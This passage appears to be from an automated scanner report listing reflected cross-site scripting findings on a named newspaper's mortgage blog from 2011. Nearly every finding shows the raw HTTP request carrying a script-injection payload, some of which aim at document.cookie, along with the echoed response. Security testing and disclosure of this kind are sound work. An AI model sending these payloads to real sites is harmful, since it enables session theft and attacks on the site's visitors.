X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/415025367a\"><script>alert(1)</script>8c4f91db03b/feed/" />
...[SNIP]...

1.374. http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/29/couple-might-be-better-off-with-short-sale/41502/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c45d"><script>alert(1)</script>8eb8cd1b964 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c45d\"><script>alert(1)</script>8eb8cd1b964 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/29/couple-might-be-better-off-with-short-sale/41502/?6c45d"><script>alert(1)</script>8eb8cd1b964=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41502>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77827


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
/rss+xml" title=" Couple might be better off with short sale - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/29/couple-might-be-better-off-with-short-sale/41502/?6c45d\"><script>alert(1)</script>8eb8cd1b964=1feed/" />
...[SNIP]...

1.375. http://mortgage.ocregister.com/2011/02/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/02/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6be24"><script>alert(1)</script>6d101414c29 was submitted in the REST URL parameter 1. This input was echoed as 6be24\"><script>alert(1)</script>6d101414c29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20116be24"><script>alert(1)</script>6d101414c29/02/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20116be24\"><script>alert(1)</script>6d101414c29/02/feed/" />
...[SNIP]...

1.376. http://mortgage.ocregister.com/2011/02/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/02/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2022c"><script>alert(1)</script>df2f3673541 was submitted in the REST URL parameter 2. This input was echoed as 2022c\"><script>alert(1)</script>df2f3673541 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/022022c"><script>alert(1)</script>df2f3673541/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/022022c\"><script>alert(1)</script>df2f3673541/feed/" />
...[SNIP]...

1.377. http://mortgage.ocregister.com/2011/02/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/02/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be6d4"><script>alert(1)</script>10654d20381 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as be6d4\"><script>alert(1)</script>10654d20381 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/?be6d4"><script>alert(1)</script>10654d20381=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2011 February - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/?be6d4\"><script>alert(1)</script>10654d20381=1feed/" />
...[SNIP]...

1.378. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848f3"><script>alert(1)</script>73c38926bd3 was submitted in the REST URL parameter 5. This input was echoed as 848f3\"><script>alert(1)</script>73c38926bd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668848f3"><script>alert(1)</script>73c38926bd3/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
ternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668848f3\"><script>alert(1)</script>73c38926bd3/feed/" />
...[SNIP]...

1.379. http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 231b3"><script>alert(1)</script>bb110f17cc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 231b3\"><script>alert(1)</script>bb110f17cc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/?231b3"><script>alert(1)</script>bb110f17cc5=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:08:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41668>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83614


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
title=" Predatory lending suit settles for $6.5 million - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/02/02/predatory-lending-suit-settles-for-6-5-million/41668/?231b3\"><script>alert(1)</script>bb110f17cc5=1feed/" />
...[SNIP]...

1.380. http://mortgage.ocregister.com/44146092a8373b49c062f68d9825aa14.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /44146092a8373b49c062f68d9825aa14.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00fb"><script>alert(1)</script>98a4af95827 was submitted in the REST URL parameter 1. This input was echoed as b00fb\"><script>alert(1)</script>98a4af95827 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b00fb"><script>alert(1)</script>98a4af95827?t=1759807488 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:02:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:02:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/b00fb\"><script>alert(1)</script>98a4af95827?t=1759807488feed/" />
...[SNIP]...

1.381. http://mortgage.ocregister.com/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a6c3"><script>alert(1)</script>30983565075 was submitted in the REST URL parameter 1. This input was echoed as 9a6c3\"><script>alert(1)</script>30983565075 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css9a6c3"><script>alert(1)</script>30983565075/print.css HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:02:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:02:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/css9a6c3\"><script>alert(1)</script>30983565075/print.cssfeed/" />
...[SNIP]...

1.382. http://mortgage.ocregister.com/css/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /css/print.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6883"><script>alert(1)</script>aee79722e35 was submitted in the REST URL parameter 2. This input was echoed as c6883\"><script>alert(1)</script>aee79722e35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/print.cssc6883"><script>alert(1)</script>aee79722e35 HTTP/1.1
Host: mortgage.ocregister.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:02:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:02:22 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 62649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/css/print.cssc6883\"><script>alert(1)</script>aee79722e35feed/" />
...[SNIP]...

1.383. http://mortgage.ocregister.com/feed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feed/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71cd"><script>alert(1)</script>1f35e8c0ea2 was submitted in the REST URL parameter 1. This input was echoed as a71cd\"><script>alert(1)</script>1f35e8c0ea2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd"><script>alert(1)</script>1f35e8c0ea2/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 16:23:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 16:23:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd\"><script>alert(1)</script>1f35e8c0ea2/feed/" />
...[SNIP]...

1.384. http://mortgage.ocregister.com/feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b243<script>alert(1)</script>b89f925ed73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd"><script>alert(document.cookie)</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:07:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:07:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
</script>1f35e8c0ea2/feed5b243<script>alert(1)</script>b89f925ed73/feed/" />
...[SNIP]...

1.388. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a614"><script>alert(1)</script>e492f5d219d was submitted in the REST URL parameter 1. This input was echoed as 4a614\"><script>alert(1)</script>e492f5d219d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(14a614"><script>alert(1)</script>e492f5d219d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:18 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(14a614\"><script>alert(1)</script>e492f5d219dfeed/" />
...[SNIP]...

1.389. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee1f2"><script>alert(1)</script>14894bf18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee1f2\"><script>alert(1)</script>14894bf18ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2"><script>alert(1)</script>14894bf18ef=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:08:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:08:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(1?ee1f2\"><script>alert(1)</script>14894bf18ef=1feed/" />
...[SNIP]...

1.390. http://mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2efa0"><script>alert(1)</script>c5d2576f89d was submitted in the REST URL parameter 1. This input was echoed as 2efa0\"><script>alert(1)</script>c5d2576f89d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeda71cd%2522%253E%253Cscript%253Ealert(document.cookie2efa0"><script>alert(1)</script>c5d2576f89d HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
